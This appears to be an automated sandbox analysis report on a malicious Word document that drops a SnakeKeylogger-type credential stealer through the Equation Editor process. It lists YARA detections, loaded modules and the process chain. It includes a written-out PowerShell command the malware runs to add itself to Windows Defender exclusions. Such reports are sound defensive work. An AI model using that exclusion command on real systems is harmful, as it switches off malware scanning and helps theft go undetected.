Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B82F8 13_2_008B82F8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B75F0 13_2_008B75F0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B8FF0 13_2_008B8FF0
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B9D08 13_2_008B9D08
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BB308 13_2_008BB308
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B9000 13_2_008B9000
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B0006 13_2_008B0006
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B461A 13_2_008B461A
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BB318 13_2_008BB318
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BEE10 13_2_008BEE10
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B3910 13_2_008B3910
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BC010 13_2_008BC010
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BCD28 13_2_008BCD28
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B4628 13_2_008B4628
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B6028 13_2_008B6028
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BC020 13_2_008BC020
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B3920 13_2_008B3920
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B5326 13_2_008B5326
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B6038 13_2_008B6038
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B7A3E 13_2_008B7A3E
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BF731 13_2_008BF731
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B5330 13_2_008B5330
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BDA30 13_2_008BDA30
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B6D30 13_2_008B6D30
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B7A48 13_2_008B7A48
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B9448 13_2_008B9448
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BF740 13_2_008BF740
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B6D40 13_2_008B6D40
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B8740 13_2_008B8740
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BAA59 13_2_008BAA59
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B9458 13_2_008B9458
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B305F 13_2_008B305F
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B8750 13_2_008B8750
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BAA68 13_2_008BAA68
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B3D68 13_2_008B3D68
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BC468 13_2_008BC468
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BB760 13_2_008BB760
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B3D78 13_2_008B3D78
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BC478 13_2_008BC478
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BE978 13_2_008BE978
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B5778 13_2_008B5778
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BDE78 13_2_008BDE78
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008BB770 13_2_008BB770
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B3070 13_2_008B3070
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_008B4A70 13_2_008B4A70
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C550D8 13_2_00C550D8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C549F8 13_2_00C549F8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C557B8 13_2_00C557B8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C50040 13_2_00C50040
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C53558 13_2_00C53558
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C52E78 13_2_00C52E78
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C54318 13_2_00C54318
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C53C38 13_2_00C53C38
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C550C8 13_2_00C550C8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C50ED8 13_2_00C50ED8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C549E9 13_2_00C549E9
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C52AF9 13_2_00C52AF9
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C557A8 13_2_00C557A8
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C5354B 13_2_00C5354B
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C52E68 13_2_00C52E68
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C52B00 13_2_00C52B00
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C54308 13_2_00C54308
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C52121 13_2_00C52121
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C53C28 13_2_00C53C28
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Code function: 13_2_00C52130 13_2_00C52130
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Yara signature match
Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: H363BpKqz0MdVd7[1].exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: millitingacy20306.exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, COVID19.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, VIPSeassion.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, iMjZsLFxfxH3l8nvPC.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, iMjZsLFxfxH3l8nvPC.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.cs Security API names: _0020.SetAccessControl
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.millitingacy20306.exe.5530000.7.raw.unpack, JMsQw4TYy6wBk4vgS3.cs Security API names: _0020.AddAccessRule
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.cs Security API names: _0020.SetAccessControl
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.millitingacy20306.exe.3468020.4.raw.unpack, JMsQw4TYy6wBk4vgS3.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winDOC@8/22@28/8
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$25139776.docx.doc Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRA497.tmp Jump to behavior
Source: 0225139776.docx.doc OLE indicator, Word Document stream: true
Source: ~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x.......................bh.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x.......................sh.........................s............8.+............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x........................h.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x........................h.........................s............8.+............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x........................h.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x........................i.........................s............8.+............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n.......x.......................yi.........................s............8.+............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x........................i.........................s............8.+............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........i.........................s............8.+..... ....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x........................i.........................s............8.+............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x........................i.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x........................i.........................s............8.+............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......i.........................s............8.+.....$....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x.......................%j.........................s............8.+............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x...............h.......Jj.........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x.......................ej.........................s............8.+............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............8.+.....2....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x........................j.........................s............8.+............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x........................j.........................s....................l....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x...............$........j.........................s............8.+............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.....x...............$........j.........................s............8.+............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....x...............$........k.........................s............8.+............................. Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 0225139776.docx.doc ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Process created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe" Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe Section loaded: amsi.dll Jump to behavior
